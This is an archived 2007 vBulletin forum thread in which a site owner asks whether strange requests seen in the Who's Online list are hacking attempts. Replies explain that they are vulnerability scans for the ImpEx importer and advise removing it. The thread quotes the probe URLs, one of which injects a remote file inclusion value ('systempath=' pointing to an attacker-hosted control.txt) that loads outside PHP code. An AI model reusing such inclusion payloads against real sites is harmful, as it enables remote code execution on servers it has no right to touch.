vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB3 Programming Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=15)
-   -   is this hacker's method? (https://vborg.vbsupport.ru/showthread.php?t=160241)

FoReX 10-14-2007 07:20 PM
is this hacker's method?
 
While i see Who is online page, i saw this link one quest.

http://................................temap/cmd.txt?

http://www.cpper.com/c/vbgsitemap/cmd.txt file include php code..

is this codes harmful? or hackers method?

Marco van Herwaarden 10-15-2007 05:26 AM
It is someone checking for vulnerabilities. If you have kept your versions up2date, this is nothing to worry about.

FoReX 10-15-2007 06:47 AM
Quote:
Originally Posted by Marco van Herwaarden (Post 1360478)
It is someone checking for vulnerabilities. If you have kept your versions up2date, this is nothing to worry about.
Thanks marco..

I'm using Vbulletin 3.6.8 and vBadvanced CMPS v3.0 RC1.

can i need any update?

Marco van Herwaarden 10-15-2007 06:57 AM
You are already running the latest vBulletin. Just make sure you don't have an old (remove or upgrade if needed) of ImpEx on your server.

I don't know about vBadvanced, but the attempt was not addressing vBA.

FoReX 10-15-2007 09:34 AM
I saw again smiliar links:
Quote:
..................com/forum.php/impex/clientscript/vbulletin_read_marker.js?v=368
and
Quote:
.........................com/forum.php//impex/ImpExData.php? systempath=http://futurehousingsystems.com/images/control.txt?
if this links harmfull or hackers method we will happy your report ...

ragtek 10-15-2007 10:02 AM
if you havent "installed" impex(removed it after importing) nothing can happen

nexialys 10-15-2007 10:21 AM
the person/robot who visit your site with this script is someone willing to verify if you have ImpEx installed... lately, there was some insert/exploits compromissing the presence of ImpEx in your forum... btw, you should be safe as you do not have it installed.

Marco van Herwaarden 10-15-2007 11:05 AM
lately??

The latest vulnerability in ImpEx was a 1-time error i think over a year ago. See also https://vborg.vbsupport.ru/showpost....7&postcount=13

nexialys 10-15-2007 11:23 AM
lately can be one year old, remember that people are not updating their ImpEx the same way they change their underwears...

Analogpoint 10-15-2007 05:54 PM
In any case, you shouldn't have impex on your server unless you're actively importing or exporting something. If not, remove it.


All times are GMT. The time now is 10:40 AM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01925 seconds
  • Memory Usage 1,724KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (3)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (10)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete